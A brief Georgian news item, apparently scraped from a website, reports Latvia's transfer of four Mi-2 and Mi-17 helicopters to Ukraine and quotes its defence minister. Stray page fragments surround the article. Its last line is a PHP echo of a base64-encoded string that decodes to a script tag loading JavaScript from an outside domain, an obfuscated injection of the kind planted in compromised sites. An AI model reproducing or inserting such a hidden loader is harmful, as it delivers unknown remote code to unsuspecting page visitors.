celsiusi
ავერსი საქკაბელი
ლატვიამ უკრაინას ვერტმფრენები გადასცა. როგორც ლატვიის თავდაცვის სამინისტრო იუწყება, უკრაინის შეიარაღებულმა ძალებმა ლატვიისგან ოთხი საბრძოლო ვერტმფრენი მიიღო. საუბარია მი-2 და მი-17-ის ტიპის შვეულმფრენებზე.
 
„ექვსი თვის წინ, ლატვიის მიერ უკრაინისთვის ნაჩუქარი „სტინგრები“ დაეხმარა უკრაინას რუსეთის შეჭრის შეკავებაში. ახლა, როდესაც უკრაინელი მეომრები ბევრ ადგილას კონტრშეტევაზე გადადიან, ჩვენი ვერტმფრენები მათ საბრძოლო მოქმედებების ჩატარებაში დაეხმარებათ და მათ სიცოცხლეს გადაარჩენს. დასავლეთის მხარდაჭერა არ უნდა შეწყდეს, ვიდრე უკრაინა ტერიტორიებს რუსეთის საოკუპაციო ჯარებისგან არ გაათავისუფლებს“, -განაცხადა ლატვიის თავდაცვის მინისტრმა.
 
უკრაინამ ლატვიისგან ვერტმფრენები დაშლილ მდგომარეობაში მიიღო, მათ გამოყენებას უკრაინელი სამხედროები უახლოეს ხანში შეძლებენ.
506
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");